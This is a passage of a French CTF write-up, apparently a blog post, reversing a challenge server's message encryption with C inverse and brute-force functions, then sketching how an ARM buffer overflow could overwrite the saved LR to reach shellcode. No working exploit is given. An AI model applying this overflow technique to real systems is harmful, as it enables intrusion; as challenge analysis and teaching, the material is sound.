'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">for</span> <span style="color: #66cc66;">(</span>i <span style="color: #66cc66;">=</span> <span style="color: #cc66cc;">1</span>; i <span style="color: #66cc66;">!=</span> <span style="color: #cc66cc;">80</span> ; i<span style="color: #66cc66;">++</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> memcpy<span style="color: #66cc66;">(</span>buff2,magic<span style="color: #66cc66;">+</span>i<span style="color: #66cc66;">*</span>0x30,0x10<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff2,0x10,c2<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,buff2,0x10,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">default</span> <span style="color: #66cc66;">:</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> crypt<span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>PDWORD<span style="color: #66cc66;">)</span>buff,0x34,c2<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> send<span style="color: #66cc66;">(</span>socket,buff,0x34,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #000000; font-weight: bold;">break</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> shutdown<span style="color: #66cc66;">(</span>socket,<span style="color: #cc66cc;">2</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> close<span style="color: #66cc66;">(</span>socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> free<span style="color: #66cc66;">(</span>p_socket<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span>;</div></li></ol></pre>
<p>Le message reçus sont déchiffrés à l'aide de la routine c1 (que l'on reversera bientôt <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /> )</p>
<p>magic est un buffer de 0x30*0x80 bytes dans le quel sont stockés les messages chiffré à l'aide de la routine c2 envoyés avec le code 0xCAFEBABE, ce buffer peut être dumpé à l'aide de la commande BABEBABE. Le but du challenge étant de dumper puis déchiffrer les messages stockés pour retrouver un flag qu'il faudra ensuite envoyé aux organisateurs.</p>
<p>Pour dumper ce buffer il faut donc envoyer un message commencant par le DWORD 0xBABEBABE, il est donc nécessaire d'écrire la fonction inverse de c1 :</p>
<pre class="c"><ol><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">DWORD d1<span style="color: #66cc66;">(</span>DWORD f<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD a,b,c,d,e;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> e <span style="color: #66cc66;">=</span> f <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> c <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>f >> <span style="color: #cc66cc;">16</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> a <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>c <span style="color: #66cc66;">^</span> <span style="color: #66cc66;">(</span>e <span style="color: #66cc66;">-</span> 0x2520<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> b <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>e <span style="color: #66cc66;">^</span> <span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">+</span> 0x70FB<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> c <span style="color: #66cc66;">=</span> b <span style="color: #66cc66;">-</span>0x459A;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> a <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">^</span> c<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> d <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span>b<span style="color: #66cc66;">^</span><span style="color: #66cc66;">(</span>a <span style="color: #66cc66;">-</span> 0x399A<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">&</span> 0xFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> a << <span style="color: #cc66cc;">16</span> | d;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li></ol></pre>
<p>puis il va falloir déchiffrer le résultat de cette requête en écrivant la fonction inverse de c2, cette fonction n'étant pas directement reversable, c'est plus une fonction de hash que de chiffrement, j'ai décidé de tout simplement bruteforcer la valeur des DWORD (ca prend pas mal de temps ...) à l'aide de la fonction suivante :</p>
<pre class="c"><ol><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">DWORD d2<span style="color: #66cc66;">(</span>DWORD h<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> DWORD solution;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">for</span> <span style="color: #66cc66;">(</span>solution <span style="color: #66cc66;">=</span> <span style="color: #cc66cc;">0</span>; solution < 0xFFFFFFFF ; solution<span style="color: #66cc66;">++</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>c2<span style="color: #66cc66;">(</span>solution<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> h<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> solution;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> 0xFFFFFFFF;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li></ol></pre>
<p>Ne sachant pas qu'il fallait rechercher des flags (chaine formatée de façon zarb) je cherchais une string type "passkey : ..." et je n'ai donc pas validé cette épreuve :D</p>
<p>Ensuite j'ai cherché à trouver une faille mais la fonction n'était pas faillible ... Je vais quand même brièvement expliqué comment pourrait être exploité un buffer overflow dans un environnement ARM.</p>
<p>Je vous ai dit un peu plus tôt que l'adresse de retour d'une fonction n'était pas stocké dans la pile mais dans un registre, c'est vrai pour les fonction n'appelant aucune sous fonction mais partiellement faux pour les autres. En effet ce registre étant unique, si une fonction appelle une sous fonction sans enregistrer son registre LR, il sera écrasé par l'adresse de retour de la sous fonction et la fonction l'aura donc dans l'os. C'est pourquoi au début d'une fonction appelant des sous fonctions, LR est enregistré dans la pile puis dépilé dans PC à la fin de la fonction (le fameux couple <em>STMFD SP!, {R4-R12,LR}</em> [...] <em>LDMFD SP!, {R4-R12,PC}</em>). C'est bien sur là que l'exploitation d'un buffer overflow devient possible !</p>
<p>Il <em>suffit</em> d'écraser la valeur de LR enregistrée par l'adresse de notre shellcode ou par l'adresse d'une instruction type <em>MOV PC , SP</em> et le tour est joué <img src="/themes/default/smilies/wink.png" alt=";)" class="smiley" /> (bon là c'est théorique, je ne sais pas vraiment si on trouve aussi facilement ce type d'instruction que les <em>call esp</em> en x86)</p>